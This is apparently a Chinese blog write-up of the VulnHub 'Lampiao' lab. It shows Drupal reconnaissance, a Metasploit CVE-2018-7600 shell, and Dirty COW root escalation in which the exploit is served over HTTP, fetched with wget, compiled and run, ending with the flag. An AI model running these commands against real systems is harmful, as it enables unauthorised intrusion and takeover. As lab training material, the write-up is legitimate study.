- 1Python项目1 外星人入侵_外星人_python外星人入侵项目
- 2聊聊不再兼容安卓的鸿蒙
- 3第1175期机器学习日报(2017-12-06)_腾讯优图 沈小勇
- 4Python基本数据类型巩固题_python语言中,0b开头代表二进制数,下面代码的输出结果是?x=0b1010print(x)
- 5科普扫盲---ssh免密登陆(ssh的一些小秘密)_简述ssh免密的含义
- 6Go必知必会系列:REST API与Swagger_go-restful-swagger
- 7数据集准备及数据预处理_数据理解和准备–数据集的基础工作
- 8Hadoop之/etc目录下各配置文件的作用详解
- 9C语言伪3D制作_c语言伪3d房间制作
- 10Spring boot整合sse(使用详解)_springboot sse
vulnhub--lampiao(脏牛提权)
赞
踩
目录
信息搜集
扫描网段确具体IP地址
扫描IP地址确定开放端口以及服务
浏览器查看网站
查看1898端口,发现另一个网站
发现敏感信息
看到好像有几个功能点就随手点了几下
内容方面要素过多有点没察觉到,但是这个地址栏是完全引起我的注意了特别是那个数字1
下面还有另一个标签
我打开这个页面甚至都不是先看的内容,而实地址栏,这边是node/3而上一个是node/1,虽然下面也告诉我们node/2没在工作但一定是要试试的,但是在次之前还是先将.mp3文件查看了
把这个文件名直接放在IP地址以及端口号后面地后面
http://192.168.179.157:1898/LuizGonzaga-LampiaoFalou.mp3
说实话哥们完全没听懂在唱啥,听音识曲了一下,一开始我还真找到这首歌了,但是今天再听不知道为什么网易云就是听不出来只好作罢,其实这边能给到我们的信息也不是很多,因为听不懂什么歌,那就只有歌名可能会有点文章但是现在还没get到
然后由于node/3和node/1所以我合理怀疑还有个node/2
你看看我说什么来着
查看两个文件
emmm大概去网上查了一下,这个格式问题就是可能当前浏览器不支持,换个浏览器试试
这回我听清了user:tiago,就是用户名呗
扫个码
扫描网站
dirsearch -u http://192.168.179.157:1898/原网站我也扫了,那基本就是个死的啥也没有所以就不放截图了
这个扫出来的信息还是挺多的,我们的策略就是先挑重要的看,比如和像一些配置文件啊什么的,后续再挨个查看。我就不一一把我查看这些目录的截图放上来了。
这里是我觉得信息泄露比较严重的一个点,几乎把所有的服务以及版本信息都泄露出来了
我在查看这些泄露文件的时候https://www.drupal.org绝对是最高频的一个词了,所以我一直在找和它相关的版本信息,好歹还是找到了
上百度
果然有
发现漏洞
使用msfconsole模块
搜索可能会存在漏洞的两个模块,只搜出来一个不过没关系,我们先去尝试如果不成功再转过头来找另一个
getshell
- search CVE-2018-7600
- use 0
- show options
- set rhosts 192.168.179.157
- set rport 1898
- run
- shell
尝试寻找flag信息
- cd /home
- cd tiago
- ls -al
- cd /root
没找到flag信息
明了 准备提权
提权
尝试suid提权
find / -perm -u=s -type f 2>/dev/null
试过了没有sudo权限且这些命令都不可用
脏牛提权
首先查看内核版本确定是在脏牛提权影响的linux内核版本
漏洞影响范围:Linux Kernel>=2.6.22的所有linux主机(没打过补丁的)
该范围内的核心发布之间为2007-2016年10月18日所以是在影响范围内的
使用searchsploit工具找到提权脚本
searchsploit dirty 
找到本地文件的具体位置,并将脚本文件复制到/tmp目录下(为了不损坏原文件)
- locate linux/local/40847.cpp
- scp /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp
将该文件上传到目标主机
首先在tmp目录下起以和http服务,然后目标主机通过wget下载到本地,然后将.cpp文件编译得到一个可执行文件,直接执行就能得到root账号的密码
- python -m SimpleHTTPServer 8000
- wget http://192.168.179.145:8000/40847.cpp
- g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
- ls -al
- ./40847
- ###
- 得到root的密码为dirtyCowFun
登录root账号找到flag
- ssh root@192.168.179.157
- dirtyCowFun
- cd /root
- ls -al
- cat flag.txt
- ######
- 9740616875908d91ddcdaa8aea3af366
总结
信息搜集的时候目录太多,看的我人都麻了,而且有时候不太能抓得住重点,也不能很快就找到重点信息,还有耐心还有待加强,要稳得住。后面就是我在用searchsploit工具,有时候我都找到对应的利用脚本了,却不会用。其实这个不仅我这一种解题思路,我看getshell的时候还有以和ssh爆破的,那个我也利用成功了,用户名就是咱们找到的那个tiago然后密码是从node/1解码爬取的敏感信息生成的字典。就先到这里吧,革命尚未成功,小王还得努力啊。
